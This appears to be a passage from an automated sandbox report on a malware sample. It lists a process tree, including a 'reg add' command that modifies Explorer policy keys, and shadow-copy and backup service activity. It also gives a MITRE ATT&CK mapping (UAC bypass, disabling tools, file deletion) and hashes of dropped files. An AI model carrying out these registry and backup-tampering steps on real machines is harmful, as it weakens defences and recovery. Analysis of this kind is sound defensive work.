C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:10820
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:6028
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:10712
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8904
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:7292
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:10688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3536 -ip 35361⤵PID:5596
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51e2d409fcf521ce11410137d1a303013
SHA102dc01f9433db0670f6e25d599d08be161ce9976
SHA2563afed4c13e759afe0cfbbc82278e8373679eba2fef4fe0599f67039a09bf081a
SHA512c0e63aa99da359db744eaa6fffdb045126400e1b15b2064ed8fba885c403b7e7476b3e3a50ccb93af68b11faa706c6a35b08bbc14cceb2d6680e9cc0cf0a7699
-
Filesize
12KB
MD54b41a093c0346d09c943d35511d0207f
SHA1cf95d8ecfa5d3a45c2ee32d1a661783c5a7644cf
SHA256a19e478f6a87a0442b6c009ed50b6007ea69a5f381bd418aa355b86c589905ff
SHA512e48b662500598f684e02a7e770e4a6524c4887af0df514462bf1c4bc2f33cd43e878e18ed2f60169d2be9da31a93d2e3743c170c842e705cbbe0ae6d51263fae
-
Filesize
684B
MD50f621725d7dafd2c6203fcd1949532b0
SHA16c41cd4c06d206824ecc5e7ad57f4f1ab6ef9105
SHA256fe7e06679b578f3336276022998b50c75a6b975ac631cf67652bb61099f8be0a
SHA5121e51225233813756cd06302aaf093ca2f1092125d70945d38b8b0a1dc53d71442c976d7eb893b45cf10fc2973bf3d23c3964f6b7ef5c0129e7ec7405b566e6a3